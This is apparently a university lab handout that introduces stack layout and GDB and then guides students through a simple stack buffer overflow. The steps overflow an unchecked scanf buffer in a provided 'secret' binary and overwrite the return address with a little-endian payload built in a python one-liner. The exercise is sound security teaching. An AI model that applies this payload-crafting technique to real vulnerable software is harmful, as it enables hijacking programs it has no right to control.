CS88 Lab 0: C and Assembly Primer

Lab Due Date: Tuesday, September 6, 11:59 PM

Handy References

Lab 0 Goals

Use git to clone a repository full of starter code.
Practice writing C programs and refresh your understanding of the memory layout of a process
Use GDB to identify and access functions, local variables, and function arguments in the stack.
Use GDB to map calling function calling conventions, x86 registers values.

Overview

This lab is meant to help explore the basics of reverse engineering and to set up for more advanced buffer overflow attacks in following labs. This week we will work our way through a C program to compile it into assembly and understand the basics of stack layout.

Figure shows the stack growing towards lower addresses and the state maintained within each stack frames.500

Recall from CS 31 that the stack data structure is organized into units called frames.

Each stack frame maintains the invariant: %esp or the stack pointer points to the top of the stack and %ebp or the base/frame pointer, points to the bottom of the stack.
Within each stack frame, we maintain state about the function including local variables, previous stack frame base address (or the caller’s frame pointer), the instruction to return to in the caller function and function arguments.

In this lab we will use our understanding of memory layout in the stack, to explore how we might run simple stack buffer overflows.

Lab Requirements

You will be required to:

Understand the memory layout for fib.c and use gdb to answer the questions in lab0-worksheet.adoc.
Guess the secret code on main.c by deploying a basic buffer overflow attack.
Describe how and why your buffer overflow attack works in lab0-worksheet.adoc.

Getting your Lab0 Starting Point Code

Log into CS88 Github for our class and get the ssh-URL to your lab git repository. Follow along with the prompts below to SSH, create a lab directory and clone your lab repos. For a refresher on getting setup with git take a look at Git Setup.

# ssh into our lab machines
ssh yourusername@lab.cs.swarthmore.edu

# create a cs88/labs sub-directory in your home directory
mkdir ~/cs88
cd cs88
mkdir labs
cd labs

# clone your lab0 repo into your labs sub-directory
git clone [your-ssh-URL]

# change directory to list its contents
cd lab0-you

# ls should list the following contents
ls
 Makefile README.md lab0-worksheet.adoc fib.c secret main.c

If you have not yet been assigned a github account, please follow the instructions below to access lab0 code and to get started with the lab.

# create a cs88/labs sub-directory in your home directory
mkdir ~/cs88
cd cs88
mkdir labs
cd labs
mkdir lab0-you
cd lab0-you

# copy the starter code into lab0
# USAGE: cp <source> <destination>
$ cp ~chaganti/public/cs88/lab0/*  ./   # <-- the dot means "here" (the current directory)
$ ls
 Makefile README.md lab0-worksheet.adoc main.c secret

Lab-0 Functionality

To get started with the lab run make. You should now see a compiled binary fib along with secret. Run the following command to set executable permissions on secret: chmod +x secret. A successful attack on secret is shown below:

$ ./secret < attack
Enter secret number:
You are so wrong!
You win!

As you work through this lab it will be helpful to have the source code open in the editor of your choice, and a separate terminal window to run gdb.

Your first task is to use gdb to walk through fib and use the references provided on this lab page to answer questions in lab0-workseet.adoc. Here are some basic gdb commands to get you started:

gdb fib     #runs gdb debugger on fib.
break main  #sets a breakpoint in main
break 4     #sets a breakpoint on line 4
run         #runs the code and stops at the first breakpoint.

info break #displays a list of breakpoints

Example:
Num     Type           Disp Enb Address    What
1       breakpoint     keep y   0x0000120e in main at fib.c:17
2       breakpoint     keep y   0x000011ae in f at fib.c:4

disas main #disassembly for main
info reg              #shows the register addresses and values
info reg esp ebp eip  #shows specific register addresses

Example:
esp            0xffffd810          0xffffd810
ebp            0xffffd818          0xffffd818
eip            0x565561ae          0x565561ae <f+17>

info frame      #information about the current frame
help info frame #provides "man" page equivalent for the command.

You can also run a single gdb command in a separate terminal window to view the output of disas. Open a new terminal window and run the following command.

# command to view assembly from functions main and f in file fib.c
gdb -batch -ex 'file fib' -ex "disassemble main" -ex "disassemble f"

# command to view assembly from function main in file fib.c
gdb -batch -ex 'file fib' -ex "disassemble main"

# command to view assembly from function main in file secret
gdb -batch -ex 'file secret' -ex "disassemble main"

There are many more examples provided in the readings above, walk through those readings to answer the questions in the worksheet.

Simple Buffer Overflow

Once you are familiar with the workings of fib.c you should be ready to move on to secret.

For the second part of the lab, you are provided with a compiled binary secret that is called by main. Your job is to get to endGame() without loosing. To do so you will have to provide input to the function either that correctly guesses the secret string, and the correct secret value, or as a savy reverse engineering hack, by pass all of the code and force the function to execute endGame.

To see how secret works let’s run it with some arbitrary user input:

$ ./secret
Enter secret number:
1
You are so wrong!

Unfortunately we don’t have the source code for secret - (that would make this task trivial). But we do have main that calls on functions defined in secret. Looking at main we see that it takes as input a char buf that is 12 characters long, performs some operations on this buffer before calling endGame.

Naive Approach: Your first task is to use gdb to figure out what the functions getSecretCode and calculateValue do. Use gdb to walk through the function and figure out at a high-level what each of these functions do.
Security Mindset: In this task, you decide to be smarter and find loopholes or vulnerabilities in the code that you can take advantage of to get past the checks to reach endGame and succeed.
- Notice that one of the first instructions in main is the call to scanf. If you type man scanf on the terminal, you will notice that there is no specification for the length of the string that scanf takes as input!
- You can now leverage this and try to enter an input to main as a secret number that far exceeds the length of buf and see the results. If you see a segmentation fault you are on the right track! You’ve effectively "overflown" the buffer into neighboring regions of memory (in this case the stack memory located at higher addresses), and corrupted the state of the frame causing the program to SEGFAULT.
  $ ./secret Enter secret number: 1233943249324320948234091238401923874129348710329587495 You are so wrong! Segmentation fault (core dumped)
- Since our goal is not to simply corrupt the code but manipulate it to win we can try being slightly smarter with how we add data to our input. We can now overflow our stack in a manner such that when reach the eip register we overwrite it to point to the instruction to endGame.
- To accomplish this, let’s first call gdb with 12 1 s as input. To automate the process of creating multiple inputs we can use a python command to help us out: python -c 'print "1"x12' > allOnes.
- In gdb you can just pipe this input when we run secret as follows:
  $gdb secret (gdb) break main Breakpoint 1 at 0x8048575 (gdb) run < allOnes Breakpoint 1, 0x08048575 in main () (gdb)
  You can now try to put a breakpoint right after the call to scanf to confirm that our input of all 1s is in memory. Hint: Try using the examine command x/20w $esp to view 20 words on the top of the stack.
- Once you figure out the starting address of the array buf you can calculate the distance from this memory address to the location of eip on the stack. If we manage to overflow eip to point to the location of endGame, then we have successfully launced a buffer overflow attack!

In order to add a memory address into our secret number to change the value in eip, we need to account for the fact that multi-byte memory addresses in x86 CPUs use a little-endian format - i.e. from the least-significant byte ("little end") to the most-significant byte in consecutive addresses.

Therefore, if we wanted to store a memory address of 0xabcdefgh in our buffer following a string of 1 s, we would use the following command python -c 'print "1"*12 + "\xgh\xef\xcd\xab"'>attack.

Miscellaneous hints

Good systems programming and reverse engineering involves:

use gdb to incrementally walk through your code and provide input
use a piece of paper to draw out the stack
locate the addresses on the stack
repeat step 1

To rerun the code in gdb you can simply call run again rather than quitting gdb and ask gdb to start from the beginning. This way, your breakpoints are preserved.
You can also change values of variables during execution in gdb using (gdb) set {int}0xfffff = 3.

Grading Rubric

Total: 30 points

10 points for successfully causing a buffer overflow in secret.
20 points for completing the worksheet.

Submitting

Please remove any debugging output prior to submitting.

To submit your code, simply commit your changes locally using git add and git commit. Then run git push while in your lab directory.